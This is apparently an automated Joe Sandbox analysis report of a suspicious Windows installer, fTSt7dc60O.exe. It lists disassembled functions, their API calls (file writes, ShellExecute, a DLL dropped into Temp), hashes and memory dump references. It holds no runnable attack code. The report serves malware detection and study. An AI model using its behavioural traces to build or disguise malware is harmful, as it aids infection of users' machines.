                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                      • Instruction ID: c838968d9b53d15d037ad3ebbdc97e0e82191de3b695f5e6670933e8e46a19ea
                                                      • Opcode Fuzzy Hash: c0ce892580bc14cf4332d57b508c1e8237967f859a0b842146343ba826295983
                                                      • Instruction Fuzzy Hash: E9026EB0A00209EFDB209F94DC85AAE7BB5FB44314F10857AF610BA2E1C7799D42CF58
                                                      Function 00404635 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 265stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404684
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004046AE
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040475F
                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040476A
                                                      • lstrcmpiW.KERNEL32(Call,004226E8,00000000,?,?), ref: 0040479C
                                                      • lstrcatW.KERNEL32(?,Call), ref: 004047A8
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004047BA
                                                        • Part of subcall function 00405708: GetDlgItemTextW.USER32(?,?,00000400,004047F1), ref: 0040571B
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                        • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                        • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000000,004206B8,?,?,000003FB,?), ref: 0040487B
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404896
                                                      • SetDlgItemTextW.USER32(00000000,00000400,004206A8), ref: 0040490F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$&B
                                                      • API String ID: 2246997448-1365839044
                                                      • Opcode ID: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                      • Instruction ID: 6e37369fe6ef7f71d764005b1086c215e28ed7130f32df1ae996be3c53d44702
                                                      • Opcode Fuzzy Hash: 0ddb93969d7d4b6c2286eeeb01da71e9d9c76c94d99e26f32eb17bb22fa58419
                                                      • Instruction Fuzzy Hash: A79170F1900219EBDB10AFA1DC85AAF77B8EF85714F10443BF601B62D1D77C9A418B69
                                                      Function 00402770 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040277F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                      • Instruction ID: 2908b39070a7deba1428861388b98b097f8f9174a2682adf846a4f1dff5e2c07
                                                      • Opcode Fuzzy Hash: 270cfe79e7700546bd1110db50653953e97246535dd0ce6893212cd2a7b1ecea
                                                      • Instruction Fuzzy Hash: D5F05EB16101149BCB00DBA4DD499BEB378FF04318F3005BAE151F31D0D6B859409B2A
                                                      Function 00404337 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 207windowstringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004043D5
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004043E9
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404406
                                                      • GetSysColor.USER32(?), ref: 00404417
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404425
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404433
                                                      • lstrlenW.KERNEL32(?), ref: 00404438
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404445
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040445A
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004044B3
                                                      • SendMessageW.USER32(00000000), ref: 004044BA
                                                      • GetDlgItem.USER32(?,000003E8), ref: 004044E5
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404528
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404536
                                                      • SetCursor.USER32(00000000), ref: 00404539
                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 0040454E
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040455A
                                                      • SetCursor.USER32(00000000), ref: 0040455D
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040458C
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040459E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: Call$N$open
                                                      • API String ID: 3615053054-2563687911
                                                      • Opcode ID: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction ID: 8b9c65ccee0929ae2cd37a550bbe3266d1c56d3aba5277cbe5cc7d17fb3eae84
                                                      • Opcode Fuzzy Hash: 3a3e15a46bcef9b8006e363d6ddaa5c0bc478510f2ba28bfd0355cb20498c547
                                                      • Instruction Fuzzy Hash: 19718FB1A00209FFDB109F60DD85A6A7BA9FB94354F00853AFB01B62D1C778AD51CF99
                                                      Function 00405C66 Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 136stringmemoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C76
                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
                                                      • GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                        • Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                      • GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
                                                      • wsprintfA.USER32 ref: 00405CDE
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                      • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 00405BB8
                                                        • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                      • API String ID: 1265525490-899692902
                                                      • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                      • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                      • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                      • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                      • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                      • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                      Function 100022D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1384748730.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.1384465097.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385695895.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000000.00000002.1385764243.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                      • String ID: @H3w
                                                      • API String ID: 4216380887-4275297014
                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                      Function 004061DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 0040623F
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406253
                                                      • CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00000000,00403332,C:\Users\user~1\AppData\Local\Temp\,771B3420,00403542), ref: 00406266
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\fTSt7dc60O.exe"$*?|<>/":$C:\Users\user~1\AppData\Local\Temp\
                                                      • API String ID: 589700163-2730664359
                                                      • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                      • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                      • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                      Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                      • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,?,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp,000000FF,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                      • String ID: 8$C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp$C:\Users\user~1\AppData\Local\Temp\nsb9BB3.tmp\System.dll
                                                      • API String ID: 1453599865-907821908
                                                      • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                      • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                      • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                      • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                      Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                      • GetSysColor.USER32(00000000), ref: 0040423A
                                                      • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                      • SetBkMode.GDI32(?,?), ref: 00404252
                                                      • GetSysColor.USER32(?), ref: 00404265
                                                      • SetBkColor.GDI32(?,?), ref: 00404275
                                                      • DeleteObject.GDI32(?), ref: 0040428F
                                                      • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                      Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365197746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1365171728.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365230267.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365260040.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1365412260.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
